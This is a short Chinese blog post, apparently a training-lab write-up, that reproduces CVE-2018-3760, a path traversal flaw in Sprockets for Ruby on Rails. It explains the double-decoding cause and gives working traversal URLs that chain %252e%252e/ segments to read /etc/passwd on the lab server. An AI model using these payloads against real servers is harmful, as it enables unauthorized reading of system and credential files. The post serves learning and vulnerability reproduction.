码迷,mamicode.com
首页 > 其他好文 > 详细

墨者 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

时间:2020-04-20 01:37:31      阅读:106      评论:0      收藏:0      [点我收藏+]

标签:服务器   png   height   usr   rails   技术   href   conf   文件的   

首先得去了解这个漏洞的原理

Ruby On Rails在开发环境下使用Sprockets作为静态文件服务器,Ruby On Rails是著名Ruby Web开发框架,Sprockets是编译及分发静态资源文件的Ruby库。

Sprockets 3.7.1及之前版本中,存在一处因为二次解码导致的路径穿越漏洞,攻击者可以利用%252e%252e/来跨越到根目录,读取或执行目标服务器上任意文件。



版本 <=Sprockets 3.7.1
利用手法 %252e%252e/ 不断返回上级目录

之后用http://219.153.49.228:45351/assets/file:%2f%2f/etc/passwd尝试读取其存放密码的文件
但是发现
技术图片
但是他爆出来很多可以访问的目录
于是通过可以访问的目录 然后不断 %252e%252e/  %252e%252e/ 返回根目录 再去访问/etc/password
http://219.153.49.228:45351/assets/file:%2f%2f/usr/src/blog/app/assets/config/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd

?技术图片

墨者 Ruby On Rails漏洞复现第一题(CVE-2018-3760)

标签:服务器   png   height   usr   rails   技术   href   conf   文件的   

原文地址:https://www.cnblogs.com/cat47/p/12735334.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!